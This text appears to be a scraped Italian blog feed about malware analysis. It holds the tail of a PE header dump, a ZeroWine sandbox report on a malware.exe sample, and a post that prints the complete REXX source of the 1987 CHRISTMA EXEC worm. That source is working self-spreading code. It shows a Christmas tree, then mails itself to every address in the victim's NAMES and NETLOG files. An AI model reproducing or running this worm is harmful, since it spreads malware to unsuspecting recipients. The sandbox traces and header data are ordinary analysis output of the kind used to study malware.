/>[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_RESERVED]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br /><br />----------Imported symbols----------<br /><br />[IMAGE_IMPORT_DESCRIPTOR]<br />OriginalFirstThunk: 0x0 <br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />ForwarderChain: 0x0 <br />Name: 0x60CC <br />FirstThunk: 0x6064 <br /><br />kernel32.dll.GetCurrentThreadId Hint[0]<br />kernel32.dll.ExitProcess Hint[0]<br />kernel32.dll.RtlUnwind Hint[0]<br />kernel32.dll.RaiseException Hint[0]<br />kernel32.dll.GetCommandLineA Hint[0]<br />kernel32.dll.TlsSetValue Hint[0]<br />kernel32.dll.TlsGetValue Hint[0]<br />kernel32.dll.LocalAlloc Hint[0]<br />kernel32.dll.GetModuleHandleA Hint[0]<br />kernel32.dll.GetModuleFileNameA Hint[0]<br />kernel32.dll.FreeLibrary Hint[0]<br />kernel32.dll.HeapFree Hint[0]<br />kernel32.dll.HeapReAlloc Hint[0]<br />kernel32.dll.HeapAlloc Hint[0]<br />kernel32.dll.GetProcessHeap Hint[0]<br /><br />[IMAGE_IMPORT_DESCRIPTOR]<br />OriginalFirstThunk: 0x0 <br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />ForwarderChain: 0x0 <br />Name: 0x61C8 <br />FirstThunk: 0x60A4 <br /><br />user32.dll.CharNextA Hint[0]<br /><br />[IMAGE_IMPORT_DESCRIPTOR]<br />OriginalFirstThunk: 0x0 <br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />ForwarderChain: 0x0 <br />Name: 0x61E0 <br />FirstThunk: 0x60AC <br /><br />kernel32.dll.LoadLibraryA Hint[0]<br />kernel32.dll.GetProcAddress Hint[0]<br />kernel32.dll.GetModuleHandleA Hint[0]<br />kernel32.dll.GetModuleFileNameA Hint[0]<br />kernel32.dll.ExitProcess Hint[0]<br /><br />[IMAGE_IMPORT_DESCRIPTOR]<br />OriginalFirstThunk: 0x0 <br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />ForwarderChain: 0x0 <br />Name: 0x6248 <br />FirstThunk: 0x60C4 <br /><br />ntdll.dll.RtlDecompressBuffer Hint[0]<br /><br />----------Resource directory----------<br /><br />[IMAGE_RESOURCE_DIRECTORY]<br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />MajorVersion: 0x4 <br />MinorVersion: 0x0 <br />NumberOfNamedEntries: 0x0 <br />NumberOfIdEntries: 0x3 <br /> Id: [0x3] (RT_ICON)<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x3 <br /> OffsetToData: 0x80000028<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x2 <br /> Id: [0x1]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x1 <br /> OffsetToData: 0x80000080<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x2 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x0 <br /> OffsetToData: 0x100 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x918C <br /> Size: 0x8A8 <br /> CodePage: 0x4E4 <br /> Reserved: 0x0 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0xC0C <br /> OffsetToData: 0x110 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x9A34 <br /> Size: 0x2E8 <br /> CodePage: 0x4E4 <br /> Reserved: 0x0 <br /> Id: [0x2]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x2 <br /> OffsetToData: 0x800000A0<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0xC0C <br /> OffsetToData: 0x120 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x9D1C <br /> Size: 0x128 <br /> CodePage: 0x4E4 <br /> Reserved: 0x0 <br /><br /> Id: [0xA] (RT_RCDATA)<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0xA <br /> OffsetToData: 0x80000048<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x2 <br /> NumberOfIdEntries: 0x0 <br /> Name: [DVCLAL]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x80000160<br /> OffsetToData: 0x800000B8<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x0 <br /> OffsetToData: 0x130 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x9E44 <br /> Size: 0x10 <br /> CodePage: 0x4E4 <br /> Reserved: 0x0 <br /> Name: [KYNC]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x8000016E<br /> OffsetToData: 0x800000D0<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x0 <br /> OffsetToData: 0x140 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x9E54 <br /> Size: 0x677E <br /> CodePage: 0x4E4 <br /> Reserved: 0x0 <br /><br /> Id: [0xE] (RT_GROUP_ICON)<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0xE <br /> OffsetToData: 0x80000068<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x1 <br /> NumberOfIdEntries: 0x0 <br /> Name: [MAINICON]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x80000178<br /> OffsetToData: 0x800000E8<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x4 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0xC0C <br /> OffsetToData: 0x150 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x105D4 <br /> Size: 0x22 <br /> CodePage: 0x4E4 <br /> Reserved: 0x0 <br /><br /><br />----------TLS----------<br /><br />[IMAGE_TLS_DIRECTORY]<br />StartAddressOfRawData: 0x407000 <br />EndAddressOfRawData: 0x407004 <br />AddressOfIndex: 0x40510C <br />AddressOfCallBacks: 0x408010 <br />SizeOfZeroFill: 0x0 <br />Characteristics: 0x0 <br /><br /><br /><br /></pre><br /></div><br /><br /><br />Detected trick isDebuggerPresent (Generic debugger detection)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6704470557688603565?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-55025821359270169642009-10-02T05:16:00.000-07:002009-10-02T05:22:57.799-07:00<pre>Questo vecchissimo Virus scritto in REXX ha paralizzato diversi nodi<br />nel lontano 1987 quando io avevo pressapoco 3 anni.<br />Molto simile al Virus I LOVE YOU lancia a schermo la figura di un<br />albero di natale in ascii per poi spedirsi via mail e distruggere il<br />computer.<br /><br />/*********************/<br />/* LET THIS EXEC */<br />/* */<br />/* RUN */<br />/* */<br />/* AND */<br />/* */<br />/* ENJOY */<br />/* */<br />/* YOURSELF! */<br />/*********************/<br />'VMFCLEAR'<br />SAY ' * '<br />SAY ' * '<br />SAY ' *** '<br />SAY ' ***** '<br />SAY ' ******* '<br />SAY ' ********* '<br />SAY ' ************* A'<br />SAY ' ******* '<br />SAY ' *********** VERY'<br />SAY ' *************** '<br />SAY ' ******************* HAPPY'<br />SAY ' *********** '<br />SAY ' *************** CHRISTMAS'<br />SAY ' ******************* '<br />SAY ' *********************** AND MY'<br />SAY ' *************** '<br />SAY ' ******************* BEST WISHES'<br />SAY ' *********************** '<br />SAY ' *************************** FOR THE NEXT'<br />SAY ' ****** '<br />SAY ' ****** YEAR'<br />SAY ' ****** '<br />/* browsing this file is no fun at all<br /> just type CHRISTMAS from cms */<br />dropbuf<br />makebuf<br />"q t (stack"<br />pull d1 d2 d3 d4 d5 dat<br />pull zeile<br />jeah = substr(dat,7,2)<br />tack = substr(dat,4,2)<br />mohn = substr(dat,1,2)<br />if jeah <= 88 then do if mohn <2 mohn =" 12"> 0<br />PULL NICK NAME ORT<br />NAM = INDEX(NAME,'.')+1<br />IF NAM > 0 THEN DO<br /> NAME = SUBSTR(NAME,NAM)<br />END<br />NAM = INDEX(ORT,'.')+1<br />IF NAM > 0 THEN DO<br /> ORT = SUBSTR(ORT,NAM)<br />END<br />IF LENGTH(NAME)>0 THEN DO<br /> IF LENGTH(ORT) = 0 THEN DO<br /> ORT = WO<br /> END<br /> if name ^= "RELAY" then do<br /> "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"<br /> end<br />END<br />END<br />DROPBUF<br />MAKEBUF<br />ANZ = 1<br />"EXECIO * DISKR " WER " NETLOG A (FIFO"<br />DO WHILE QUEUED() > 0<br />PULL KIND FN FT FM ACT FROM ID AT NODE REST<br />IF ACT = 'SENT' THEN DO<br /> IF ANZ = 1 THEN DO<br /> OK.ANZ = ID<br /> END<br /> IF ANZ > 1 THEN DO<br /> OK.ANZ = ID<br /> NIXIS = 0<br /> DO I = 1 TO ANZ-1<br /> IF OK.I = ID THEN DO<br /> NIXIS = 1<br /> END<br /> END<br /> END<br /> ANZ = ANZ + 1<br /> IF NIXIS = 0 THEN DO<br /> "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"<br /> END<br />END<br />END<br />DROPBUF<br />END<br />end<br />end<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5502582135927016964?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-72308108933110774252009-10-01T20:00:00.001-07:002009-10-02T08:24:36.700-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsXetuWDwqI/AAAAAAAAAQU/M3o_4QE-xDA/s1600-h/Screenshot.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 136px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsXetuWDwqI/AAAAAAAAAQU/M3o_4QE-xDA/s200/Screenshot.png" alt="" id="BLOGGER_PHOTO_ID_5387957406334698146" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br />Report:<br /><div style="margin: 5px 20px 20px;"><br /><div class="smallfont" style="margin-bottom: 2px;">Code:</div><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: auto; height: 98px; text-align: left;"><br />0009:Starting process L"Z:\\tmp\\vir\\e00fd6129b643e8c576dbf03a6b662e9\\malware.exe" (entryproc=0x409600)<br />0009:Call KERNEL32.GetCommandLineA() ret=004096a3<br />0009:Call KERNEL32.VirtualAlloc(00000000,00117674,00001000,00000040) ret=00409a05<br />0009:Call ntdll.NtAllocateVirtualMemory(ffffffff,0032f174,00000000,0032f188,00001000,00000040) ret=7b899a09<br />0009:Call ntdll.LdrShutdownProcess() ret=7b892042<br />0009:Call PE DLL (proc=0x7b8a12c0,module=0x7b820000 L"KERNEL32.dll",reason=PROCESS_DETACH,res=0x1)<br />0009:Call PE DLL (proc=0x7bc77530,module=0x7bc10000 L"ntdll.dll",reason=PROCESS_DETACH,res=0x1)<br />000b:Call KERNEL32.ExitProcess(00000000) ret=7efa8555<br />000b:Call ntdll.LdrShutdownProcess() ret=7b87302f<br />000b:Call PE DLL (proc=0x7ef84910,module=0x7ef50000 L"advapi32.dll",reason=PROCESS_DETACH,res=0x1)<br />000b:Call PE DLL (proc=0x7b8a12c0,module=0x7b820000 L"KERNEL32.dll",reason=PROCESS_DETACH,res=0x1)<br />000b:Call PE DLL (proc=0x7bc77530,module=0x7bc10000 L"ntdll.dll",reason=PROCESS_DETACH,res=0x1)<br />000b:Call ntdll.NtTerminateProcess(ffffffff,00000000) ret=7b87303f<br />000d:Call ntdll.NtClose(00000038) ret=7b873a45<br />000d:Call advapi32.RegCloseKey(00000020) ret=7efa6f7a<br />000d:Call ntdll.NtClose(00000020) ret=7eed68e8<br />000d:Call KERNEL32.ExitProcess(00000000) ret=7efac805<br />000d:Call ntdll.LdrShutdownProcess() ret=7b87302f<br />000d:Call PE DLL (proc=0x7ef7c420,module=0x7ef40000 L"rpcrt4.dll",reason=PROCESS_DETACH,res=0x1)<br />000d:Call PE DLL (proc=0x7ef29b90,module=0x7ef20000 L"iphlpapi.dll",reason=PROCESS_DETACH,res=0x1)<br />000d:Call PE DLL (proc=0x7eeee910,module=0x7eec0000 L"advapi32.dll",reason=PROCESS_DETACH,res=0x1)<br />000d:Call PE DLL (proc=0x7b8a12c0,module=0x7b820000 L"KERNEL32.dll",reason=PROCESS_DETACH,res=0x1)<br />000d:Call PE DLL (proc=0x7bc77530,module=0x7bc10000 L"ntdll.dll",reason=PROCESS_DETACH,res=0x1)<br />000d:Call ntdll.NtTerminateProcess(ffffffff,00000000) ret=7b87303f<br />malware 1966 1965 0 04:29 ? 00:00:00 /bin/sh /usr/bin/xvfb-run /home/malware/bin/malware_launcher.sh /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/malware.exe 30 /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump 1<br />malware 1979 1966 0 04:29 ? 00:00:00 /bin/sh /home/malware/bin/malware_launcher.sh /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/malware.exe 30 /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump 1<br />malware 1997 1979 0 04:30 ? 00:00:00 grep .exe<br />Dumping the process memory for child processes...<br />UID PID PPID C STIME TTY TIME CMD<br />root 1 0 0 03:53 ? 00:00:07 init [2]<br />root 2 1 0 03:53 ? 00:00:00 [migration/0]<br />root 3 1 0 03:53 ? 00:00:00 [ksoftirqd/0]<br />root 4 1 0 03:53 ? 00:00:00 [events/0]<br />root 5 1 0 03:53 ? 00:00:00 [khelper]<br />root 6 1 0 03:53 ? 00:00:00 [kthread]<br />root 9 6 0 03:53 ? 00:00:00 [kblockd/0]<br />root 10 6 0 03:53 ? 00:00:00 [kacpid]<br />root 76 6 0 03:53 ? 00:00:00 [kseriod]<br />root 112 6 0 03:53 ? 00:00:00 [pdflush]<br />root 113 6 0 03:53 ? 00:00:00 [pdflush]<br />root 114 6 0 03:53 ? 00:00:00 [kswapd0]<br />root 115 6 0 03:53 ? 00:00:00 [aio/0]<br />root 810 6 0 03:54 ? 00:00:00 [kjournald]<br />root 966 1 0 03:54 ? 00:00:01 udevd --daemon<br />root 1238 6 0 03:55 ? 00:00:00 [kpsmoused]<br />root 1519 6 0 03:55 ? 00:00:00 [kmirrord]<br />root 1652 1 0 03:55 ? 00:00:00 dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0<br />root 1851 1 0 03:56 ? 00:00:00 /sbin/syslogd<br />root 1857 1 0 03:56 ? 00:00:00 /sbin/klogd -x<br />root 1879 1 0 03:56 ? 00:00:00 /usr/sbin/sshd<br />root 1897 1 0 03:56 ? 00:00:00 /usr/sbin/cron<br />malware 1919 1 0 03:56 ? 00:00:00 boa -c /home/malware/zerowine/<br />root 1931 1 0 03:56 tty1 00:00:00 /bin/login -- <br />root 1932 1 0 03:56 tty2 00:00:00 /sbin/getty 38400 tty2<br />root 1933 1 0 03:56 tty3 00:00:00 /sbin/getty 38400 tty3<br />root 1934 1 0 03:56 tty4 00:00:00 /sbin/getty 38400 tty4<br />root 1935 1 0 03:56 tty5 00:00:00 /sbin/getty 38400 tty5<br />root 1939 1 0 03:56 tty6 00:00:00 /sbin/getty 38400 tty6<br />root 1949 1931 0 04:00 tty1 00:00:00 -bash<br />root 1959 1949 0 04:00 tty1 00:00:00 hd<br />malware 1965 1919 6 04:29 ? 00:00:02 /usr/bin/python /home/malware/zerowine/cgi-bin/upload.py<br />malware 1966 1965 0 04:29 ? 00:00:00 /bin/sh /usr/bin/xvfb-run /home/malware/bin/malware_launcher.sh /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/malware.exe 30 /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump 1<br />malware 1977 1966 13 04:29 ? 00:00:04 Xvfb :99 -screen 0 640x480x8 -nolisten tcp<br />malware 1979 1966 0 04:29 ? 00:00:00 /bin/sh /home/malware/bin/malware_launcher.sh /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/malware.exe 30 /tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump 1<br />malware 1998 1979 0 04:30 ? 00:00:00 ps -edf<br />Dumping proc 1966<br />['/home/malware/bin/dump_process.py', '1966', '/tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump-1966']<br />*** Searching for process 'dump1'<br />Dumping proc 1979<br />['/home/malware/bin/dump_process.py', '1979', '/tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump-1979']<br />*** Searching for process 'dump1'<br />Dumping proc 1999<br />['/home/malware/bin/dump_process.py', '1999', '/tmp/vir/e00fd6129b643e8c576dbf03a6b662e9/dump-1999']<br />Traceback (most recent call last):<br />File "/home/malware/bin/dump_process.py", line 150, in <module><br />main(int(sys.argv[1]), sys.argv[2])<br />File "/home/malware/bin/dump_process.py", line 134, in main<br />dbg.addProcess(pid, False)<br />File "/usr/lib/python2.5/site-packages/ptrace/debugger/debugger.py", line 74, in addProcess<br />process = PtraceProcess(self, pid, is_attached, parent=parent)<br />File "/usr/lib/python2.5/site-packages/ptrace/debugger/process.py", line 165, in __init__<br />self.attach()<br />File "/usr/lib/python2.5/site-packages/ptrace/debugger/process.py", line 182, in attach<br />ptrace_attach(self.pid)<br />File "/usr/lib/python2.5/site-packages/ptrace/binding/func.py", line 155, in ptrace_attach<br />ptrace(PTRACE_ATTACH, pid)<br />File "/usr/lib/python2.5/site-packages/ptrace/binding/func.py", line 148, in ptrace<br />raise PtraceError(message, errno=errno, pid=pid)<br />ptrace.error.PtraceError: ptrace(cmd=16, pid=1999, 0, 0) error #3: No such process<br /></module></pre><br /></div><br /><br /><br />----------DOS_HEADER----------<br /><br />[IMAGE_DOS_HEADER]<br />e_magic: 0x5A4D<br />e_cblp: 0x90 <br />e_cp: 0x3 <br />e_crlc: 0x0 <br />e_cparhdr: 0x4 <br />e_minalloc: 0x0 <br />e_maxalloc: 0xFFFF<br />e_ss: 0x0 <br />e_sp: 0xB8 <br />e_csum: 0x0 <br />e_ip: 0x0 <br />e_cs: 0x0 <br />e_lfarlc: 0x40 <br />e_ovno: 0x0 <br />e_res: <br />e_oemid: 0x0 <br />e_oeminfo: 0x0 <br />e_res2: <br />e_lfanew: 0xE0 <br /><br />----------NT_HEADERS----------<br /><br />[IMAGE_NT_HEADERS]<br />Signature: 0x4550<br /><br />----------FILE_HEADER----------<br /><br />[IMAGE_FILE_HEADER]<br />Machine: 0x14C <br />NumberOfSections: 0x3 <br />TimeDateStamp: 0x44D8240C [Tue Aug 8 05:41:32 2006 UTC]<br />PointerToSymbolTable: 0x0 <br />NumberOfSymbols: 0x0 <br />SizeOfOptionalHeader: 0xE0 <br />Characteristics: 0x10F <br />Flags: IMAGE_FILE_LOCAL_SYMS_STRIPPED, IMAGE_FILE_32BIT_MACHINE, IMAGE_FILE_EXECUTABLE_IMAGE, IMAGE_FILE_LINE_NUMS_STRIPPED, IMAGE_FILE_RELOCS_STRIPPED<br /><br />----------OPTIONAL_HEADER----------<br /><br />[IMAGE_OPTIONAL_HEADER]<br />Magic: 0x10B <br />MajorLinkerVersion: 0x6 <br />MinorLinkerVersion: 0x0 <br />SizeOfCode: 0xA000<br />SizeOfInitializedData: 0x3A000<br />SizeOfUninitializedData: 0x0 <br />AddressOfEntryPoint: 0x9600<br />BaseOfCode: 0x1000<br />BaseOfData: 0xB000<br />ImageBase: 0x400000<br />SectionAlignment: 0x1000<br />FileAlignment: 0x1000<br />MajorOperatingSystemVersion: 0x4 <br />MinorOperatingSystemVersion: 0x0 <br />MajorImageVersion: 0x0 <br />MinorImageVersion: 0x0 <br />MajorSubsystemVersion: 0x4 <br />MinorSubsystemVersion: 0x0 <br />Reserved1: 0x0 <br />SizeOfImage: 0x45000<br />SizeOfHeaders: 0x1000<br />CheckSum: 0x52D15<br />Subsystem: 0x2 <br />DllCharacteristics: 0x0 <br />SizeOfStackReserve: 0x100000<br />SizeOfStackCommit: 0x1000<br />SizeOfHeapReserve: 0x100000<br />SizeOfHeapCommit: 0x1000<br />LoaderFlags: 0x0 <br />NumberOfRvaAndSizes: 0x10 <br />DllCharacteristics:<br /><br />----------PE Sections----------<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .text<br />Misc: 0x91C0<br />Misc_PhysicalAddress: 0x91C0<br />Misc_VirtualSize: 0x91C0<br />VirtualAddress: 0x1000<br />SizeOfRawData: 0xA000<br />PointerToRawData: 0x1000<br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0x60000020<br />Flags: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ<br />Entropy: 5.694083 (Min=0.0, Max=8.0)<br />MD5 hash: 1f1847d78fb8eaefc24c80ae1c21fa5a<br />SHA-1 hash: 747a1a9039d3573bcdbd511b32c55b94fe4b5508<br />SHA-256 hash: daa9a356f1aa9e1960e9d30140154dcb1d6ce661f41a3007b3ee1d517832d627<br />SHA-512 hash: 409d81a78d4218905cdb5f25d97487e5efbebf6162adc4335f626cc25f91abb5c7d7731f6d5a35debf118d412e07faea3b0b602de4dd24ebbaf1b42351fb4987<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .data<br />Misc: 0x387B8<br />Misc_PhysicalAddress: 0x387B8<br />Misc_VirtualSize: 0x387B8<br />VirtualAddress: 0xB000<br />SizeOfRawData: 0x39000<br />PointerToRawData: 0xB000<br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0xC0000040<br />Flags: IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ<br />Entropy: 6.597233 (Min=0.0, Max=8.0)<br />MD5 hash: dc7c0a1442d1b0516c6a1c10772a2567<br />SHA-1 hash: 4d4ee9200bce670e641b223c7864c2e4691f9c94<br />SHA-256 hash: f3ba616d69921d0f693b706af198014284e2eccdfdeb659328d878e791d66539<br />SHA-512 hash: 4a51f5b57a8257f8cfb80b06a557fdf8e59d3f8318d08b0c84b82d9aa79a79a73c9e063136c7fe136425332a2281b4a1905c3ece29857d6d7598ff5fba447fe2<br /><br />[IMAGE_SECTION_HEADER]<br />Name: .rsrc<br />Misc: 0xF38 <br />Misc_PhysicalAddress: 0xF38 <br />Misc_VirtualSize: 0xF38 <br />VirtualAddress: 0x44000<br />SizeOfRawData: 0x1000<br />PointerToRawData: 0x44000<br />PointerToRelocations: 0x0 <br />PointerToLinenumbers: 0x0 <br />NumberOfRelocations: 0x0 <br />NumberOfLinenumbers: 0x0 <br />Characteristics: 0x40000040<br />Flags: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ<br />Entropy: 3.197878 (Min=0.0, Max=8.0)<br />MD5 hash: 32e09078b595d43301476cbfe9c9293b<br />SHA-1 hash: 6fa704dd2933091916f9c962bca5130cbb3b0710<br />SHA-256 hash: 9abac1c2e38c96758080e677ced0b28d7cec818afb81102ddc3744d7e4f0dcf5<br />SHA-512 hash: 5917ea794d43728b86c988d835cbe3eb51faf7f62b5cb4a16d271b7ca4169fec8241afd32cb720b0f39cd5edaae62d40a52796827d27b08fe7b6dd00f99714be<br /><br />----------Directories----------<br /><br />[IMAGE_DIRECTORY_ENTRY_EXPORT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_IMPORT]<br />VirtualAddress: 0x435DC<br />Size: 0x28 <br />[IMAGE_DIRECTORY_ENTRY_RESOURCE]<br />VirtualAddress: 0x44000<br />Size: 0xF38 <br />[IMAGE_DIRECTORY_ENTRY_EXCEPTION]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_SECURITY]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_BASERELOC]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_DEBUG]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_COPYRIGHT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_GLOBALPTR]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_TLS]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_IAT]<br />VirtualAddress: 0xB000<br />Size: 0x54 <br />[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br />[IMAGE_DIRECTORY_ENTRY_RESERVED]<br />VirtualAddress: 0x0 <br />Size: 0x0 <br /><br />----------Version Information----------<br /><br />[VS_VERSIONINFO]<br />Length: 0x220 <br />ValueLength: 0x34 <br />Type: 0x0 <br /><br />[VS_FIXEDFILEINFO]<br />Signature: 0xFEEF04BD<br />StrucVersion: 0x10000<br />FileVersionMS: 0x70008<br />FileVersionLS: 0x9 <br />ProductVersionMS: 0x70008<br />ProductVersionLS: 0x9 <br />FileFlagsMask: 0x3F <br />FileFlags: 0x0 <br />FileOS: 0x40004<br />FileType: 0x1 <br />FileSubtype: 0x0 <br />FileDateMS: 0x0 <br />FileDateLS: 0x0 <br /><br />[StringFileInfo]<br />Length: 0x17E <br />ValueLength: 0x0 <br />Type: 0x1 <br /><br />[StringTable]<br />Length: 0x15A <br />ValueLength: 0x0 <br />Type: 0x1 <br />LangID: 040904b0<br /><br />FileVersion: 7, 8, 0, 9<br />CompanyName: aplanir<br />Comments: powerboat<br />ProductName: marketing<br />ProductVersion: 7, 8, 0, 9<br />FileDescription: subsecuente<br /><br />[VarFileInfo]<br />Length: 0x44 <br />ValueLength: 0x0 <br />Type: 0x1 <br /><br />[Var]<br />Length: 0x24 <br />ValueLength: 0x4 <br />Type: 0x0 <br />Translation: 0x0409 0x04b0<br /><br />----------Imported symbols----------<br /><br />[IMAGE_IMPORT_DESCRIPTOR]<br />OriginalFirstThunk: 0x43604<br />Characteristics: 0x43604<br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />ForwarderChain: 0x0 <br />Name: 0x437AA<br />FirstThunk: 0xB000<br /><br />KERNEL32.dll.lstrlenA 